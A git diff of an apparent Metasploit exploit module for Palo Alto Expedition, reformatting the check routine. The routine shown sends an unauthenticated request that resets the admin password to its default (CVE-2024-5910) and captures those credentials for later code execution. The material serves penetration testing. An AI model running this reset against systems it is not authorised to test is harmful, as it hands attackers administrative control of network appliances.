diff --git a/modules/exploits/linux/http/paloalto_expedition_rce.rb b/modules/exploits/linux/http/paloalto_expedition_rce.rb
index 5ff4479b13a2..13a785bbe6ff 100644
--- a/modules/exploits/linux/http/paloalto_expedition_rce.rb
+++ b/modules/exploits/linux/http/paloalto_expedition_rce.rb
@@ -102,28 +102,28 @@ def xsrf_token_value

 def check
 unless datastore['USERNAME'] && datastore['PASSWORD']
- unless datastore['RESET_ADMIN_PASSWD']
- print_bad("No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again.")
- return CheckCode::Unknown
- end
-
- res = send_request_cgi(
- 'method' => 'POST',
- 'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
- )
-
- return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
-
- if res.code == 403
- return CheckCode::Safe
- end
-
- return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
-
- respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓ Admin password restored to: 'paloalto'
- print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
- datastore['PASSWORD'] = respass
- datastore['USERNAME'] = 'admin'
+ unless datastore['RESET_ADMIN_PASSWD']
+ print_bad('No USERNAME and PASSWORD set. If you are sure you want to reset the admin password, set RESET_ADMIN_PASSWD to true and run the module again.')
+ return CheckCode::Unknown
+ end
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
+ )
+
+ return CheckCode::Unknown('Failed to receive a reply from the server.') unless res
+
+ if res.code == 403
+ return CheckCode::Safe
+ end
+
+ return CheckCode::Safe("Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.body.include?('Admin password restored to')
+
+ respass = res.to_s.match(/'([^']+)'/)[1] # Search for the password: ✓ Admin password restored to: 'paloalto'
+ print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
+ datastore['PASSWORD'] = respass
+ datastore['USERNAME'] = 'admin'
 end

 begin